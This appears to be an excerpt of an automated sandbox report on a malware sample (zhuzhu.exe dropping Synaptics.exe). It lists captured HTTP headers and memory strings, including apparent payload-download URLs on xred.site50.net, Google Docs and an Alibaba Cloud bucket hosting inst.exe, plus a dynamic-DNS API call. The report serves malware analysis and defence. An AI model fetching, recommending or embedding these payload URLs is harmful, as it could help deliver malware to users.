                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7QTuxNj0sUSHg-RFnOWvkw6K2fytRbD2ZQkW_axmRvMn1USAHNak69tSmj4kf8IEzFEPU7kpYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:52 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-YEzktHFHadkIvdJogiAXAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5XwCK_xyaXLJcZI2CUp4UsCtMJMsNeXQvzaksZzURYVsAMEcenqctYDZ_EyQiCPmEHBI8SFG8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:53 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-a8Pn4TsD4nKnHgv2TDUWNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5zfBR4VbL4oOfD8ZIMIHOa4YQ8suG_-CBr3b3SUAeO2O-OYJDMUpblGux7TRaQEo4rContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 03:59:53 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-2UtoT5L8l3Qhw83CXe9GXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7-DdiyOxSvq4iDIF9rJKoRZY9xiK-lO_ixyGIzPE3NqRWDJbS-Ia6WiueWSUGJWW4NContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 04:00:15 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-COVoqFmV9Nr6NogL7yko1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4i9MhZ8_eVNovoq_iFEmbX0Y7QNruoQnNTkEC-nBNazxAjAPkEzn8qQ_TvzXlF77ruContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 04:00:15 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-XpPKCDIq9_X3BZ4fGtuKLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                      Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                      Source: ._cache_zhuzhu.exe, 00000001.00000003.1771077383.0000000000B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                                      Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1779229502.0000000005DCB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                      Source: Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                      Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x
                                      Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                      Source: ._cache_zhuzhu.exe, 00000001.00000003.1771077383.0000000000B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                      Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1779229502.0000000005DCB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                      Source: ._cache_zhuzhu.exe, 00000001.00000003.1771077383.0000000000B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                      Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                      Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlD
                                      Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                                      Source: Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                                      Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                                      Source: Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                                      Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                                      Source: Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                                      Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarh
                                      Source: ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/
                                      Source: ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B23000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B26000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000004.00000002.4138120900.000000000019D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exe
                                      Source: ._cache_zhuzhu.exe, 00000001.00000002.1781152699.0000000006300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exe)
                                      Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeD
                                      Source: ._cache_zhuzhu.exe, 00000001.00000003.1771155564.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeg
                                      Source: ._cache_zhuzhu.exe, 00000001.00000002.1781152699.0000000006300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exel
                                      Source: ._cache_zhuzhu.exe, 00000001.00000002.1772550299.000000000019A000.00000004.00000010.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1772613360.0000000000400000.00000040.00000001.01000000.00000005.sdmp, ._cache_zhuzhu.exe, 00000004.00000002.4138120900.000000000019D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exep
                                      Source: ._cache_zhuzhu.exe, 00000001.00000002.1781152699.0000000006300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exet
                                      Source: ._cache_zhuzhu.exe, 00000001.00000002.1773595012.0000000000AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/t
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000069C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                                      Source: Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/H
                                      Source: Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/L
                                      Source: Synaptics.exe, 00000002.00000002.2528045833.000000001CE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/T
                                      Source: Synaptics.exe, 00000002.00000002.2535106563.000000001CFAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/cellem
                                      Source: Synaptics.exe, 00000002.00000002.2549473645.000000002303E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2487297293.000000001034E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                                      Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                                      Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmp, zhuzhu.exe, ~$cache1.2.dr, Synaptics.exe.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                                      Source: Synaptics.exe, 00000002.00000002.2443214761.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                                      Source: zhuzhu.exe, 00000000.00000003.1670210944.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2540484915.000000001F4BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2565739071.0000000026EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2463201938.00000000093CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2502599771.0000000013EFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2485503379.000000000EE0E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2504843098.000000001593E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2472302816.000000000AF4E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2516691595.000000001BBFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2517150545.000000001BFBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445443299.0000000004E9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2548846592.0000000022C7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2536484406.000000001D6BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2460777029.000000000838E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2472762472.000000000B58E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2460193517.000000000810E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2485284455.000000000EB8E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2536925382.000000001DA7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2515598461.000000001B83E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2510415975.000000001917E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.0000000007073000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%/
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.0000000007073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%k$
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%q
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%z
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.0000000000675000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&k
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download()
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(h
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(o
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.0000000000675000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)d
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download--
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-2
                                      Source: Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-9
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-U
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-UY3
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-itX
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-p
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-v53
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.-1_#
